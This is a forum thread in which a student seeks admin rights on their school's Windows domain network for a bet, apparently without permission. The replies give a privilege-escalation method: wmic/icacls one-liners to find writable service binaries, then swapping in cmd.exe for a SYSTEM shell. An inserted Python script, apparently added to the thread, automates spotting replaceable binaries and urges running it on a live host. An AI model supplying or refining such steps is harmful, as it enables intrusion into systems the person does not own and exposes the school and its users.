I am fairly new to the world of hacking; however, I am more than keen to learn!
So I've taken on my school IT admin. The bet is $50 if I can get my account admin.
I've tested all open ports, found the admin printers, etc. etc. I've also found how to edit files of other users, using PowerShell (you can start PowerShell from a batch file). The command looks a little like this:
pushd \\fileserver\users\username\
Right! Erm, so my question is: how would I go about getting admin rights?
It's running Windows 2008, not sure of the service pack.
It's a domain setup; for example, all computers log in with user and pass (maybe it's possible to find some admin users).
I've checked all the other fileservers and they need admin rights.
I've also tried to connect to an FTP server; it says that the port is unreachable, aka not open. The same thing happens when I try to ping a website.
So maybe it's possible to run an FTP server on port 80, with the web traffic? Or am I just being a complete noob? xD Sorry!
Any input would be amazing! Thanks a lot.
6 Responses
Uhhhh, if you are hacking the school computers as Windows, you COULD just live boot KonBoot, which bypasses the passwords altogether.
I should have said in the post, but we have no physical contact with the computers; still, I'll do more research into KonBoot, sounds interesting.
Thanks mate.
So I've looked up KonBoot. I get the feeling this won't help, as the school is running on a domain login :p
There's a method that exploits misconfigured service directories. Services are usually run as the SYSTEM account, which is why only admins should have access to service executables. However, sometimes they are put in directories to which all users have access. If you replace the executable with, say, cmd.exe, you can get a SYSTEM-level shell.
These two commands come in handy while looking for vulnerable services:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> a.txt
This one outputs all service executables to a text file.
for /f eol^=^"^ delims^=^" %a in (a.txt) do cmd.exe /c icacls "%a" >> b.txt
This one runs the icacls command to check file permissions. Scan b.txt for "Users:(F)" or "Everyone:(F)" or similar strings. If you see one, replace the executable with cmd.exe. After a reboot, you should have a shell open.
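The two one-liners in the reply above do the collection; the weak step is reading b.txt by eye for the literal string "Users:(F)". Inherited ACEs are printed as "BUILTIN\Users:(I)(F)" and Modify rights as "(M)", so a substring check misses most real hits, and the first loop leaves service arguments attached to the path, so icacls is sometimes run on a name that does not exist. The script below is an added example, not code from this thread: it parses the text those two commands produce, strips quotes and arguments from each service path, then decodes every icacls ACE and flags binaries that Everyone, BUILTIN\Users, Authenticated Users, INTERACTIVE or a Domain Users group can write to. The wmic and icacls outputs embedded in it are constructed samples, and the list of "low-privileged" principals and write-equivalent rights is my assumption, chosen to cover the common cases.

```python
# Added example (not from the thread): parse the output of the two cmd.exe
# one-liners and flag service binaries that low-privileged users can replace.
# Both sample outputs below are constructed for illustration.
import re

# Constructed: lines as `wmic service list full | find /i "pathname"` prints them.
WMIC_SAMPLE = r"""
PathName=C:\Windows\system32\svchost.exe -k netsvcs
PathName="C:\Program Files\Acme Backup\agent.exe" --service
PathName=C:\Tools\Monitor\monitor.exe
PathName="C:\Program Files\Vendor\updater.exe"
"""

# Constructed: what `icacls <path>` prints for each non-system32 binary above.
ICACLS_SAMPLE = r"""
C:\Program Files\Acme Backup\agent.exe NT AUTHORITY\SYSTEM:(I)(F)
                                       BUILTIN\Administrators:(I)(F)
                                       BUILTIN\Users:(I)(RX)
                                       NT AUTHORITY\Authenticated Users:(DENY)(W)

Successfully processed 1 files; Failed processing 0 files
C:\Tools\Monitor\monitor.exe NT AUTHORITY\SYSTEM:(I)(F)
                             BUILTIN\Administrators:(I)(F)
                             BUILTIN\Users:(I)(F)

Successfully processed 1 files; Failed processing 0 files
C:\Program Files\Vendor\updater.exe Everyone:(I)(M)
                                    NT AUTHORITY\SYSTEM:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Assumed: rights that let a user overwrite or swap the file (simple and specific icacls rights).
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WDAC", "WO"}
# Assumed: principals every domain user is a member of.
LOW_PRIV = {"everyone", "builtin\\users", "nt authority\\authenticated users", "nt authority\\interactive"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<flags>(?:\([^)]*\))+)$")


def is_low_priv(who):
    w = who.strip().lower()
    return w in LOW_PRIV or w.endswith("\\domain users") or w.endswith("\\users")


def service_binary_paths(wmic_output, skip_system32=True):
    """Executable path per service with quotes and arguments removed.
    The thread's one-liner keeps arguments, so icacls may be run on 'x.exe -k foo'."""
    paths = []
    for line in wmic_output.splitlines():
        line = line.strip()
        if not line.lower().startswith("pathname="):
            continue
        value = line.split("=", 1)[1].strip()
        if not value or (skip_system32 and "system32" in value.lower()):
            continue
        if value.startswith('"'):
            path = value[1:value.index('"', 1)]  # quoted path, drop args after it
        else:
            path = value.split(" ", 1)[0]        # unquoted: first token is the path
        paths.append(path)
    return paths


def parse_icacls(icacls_output, paths):
    """Map each known path to a list of (principal, set of rights), DENY ACEs excluded."""
    acl = {p: [] for p in paths}
    by_len = sorted(paths, key=len, reverse=True)  # longest prefix wins
    current = None
    for raw in icacls_output.splitlines():
        if not raw.strip():
            continue
        line = raw
        if not raw[0].isspace():
            # The first ACE of a file is printed on the same line as its path.
            current = next((p for p in by_len if raw.lower().startswith(p.lower())), None)
            if current is None:
                continue  # "Successfully processed ..." summary line
            line = raw[len(current):]
        m = ACE_RE.match(line.strip())
        if not m:
            continue
        rights, deny = set(), False
        for group in re.findall(r"\(([^)]*)\)", m.group("flags")):
            for token in (t.strip() for t in group.split(",")):
                if token == "DENY":
                    deny = True
                elif token not in INHERIT_FLAGS:
                    rights.add(token)
        if not deny:
            acl[current].append((m.group("who").strip(), rights))
    return acl


def find_weak_services(wmic_output, icacls_output):
    """(path, principal, write rights) for every binary a low-privileged user can replace."""
    paths = service_binary_paths(wmic_output)
    acl = parse_icacls(icacls_output, paths)
    return [(p, who, ",".join(sorted(r & WRITE_RIGHTS)))
            for p in paths for who, r in acl[p]
            if is_low_priv(who) and r & WRITE_RIGHTS]


def naive_scan(icacls_output):
    """The thread's check: look for the literal strings 'Users:(F)' / 'Everyone:(F)'."""
    return [l.strip() for l in icacls_output.splitlines()
            if "Users:(F)" in l or "Everyone:(F)" in l]


if __name__ == "__main__":
    print("naive hits:", naive_scan(ICACLS_SAMPLE))
    for path, who, rights in find_weak_services(WMIC_SAMPLE, ICACLS_SAMPLE):
        print(f"{path}: writable by {who} ({rights})")
```

On the constructed sample the naive scan finds nothing, while the parser flags monitor.exe (BUILTIN\Users inherits Full control) and updater.exe (Everyone has Modify) and correctly ignores the DENY entry on agent.exe. Feed it the real a.txt and b.txt the two commands produce instead of the samples to get the same result on a live host.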
Very interesting, I'll have a look into that today. I did find a fileserver that starts on login. For example,
there is a batch script there that deletes all .wma, .bat, etc. etc.
That's not the problem. I just think it has admin rights; however, I cannot edit this fileserver, so maybe it's possible to do some sort of process hijack? I'll get back to you on the SYSTEM exploit.
Thanks for the reply.
You don't have any physical contact to the machine whatsoever?
I do in the sense of mouse and keyboard, but all the hardware is locked in a cupboard.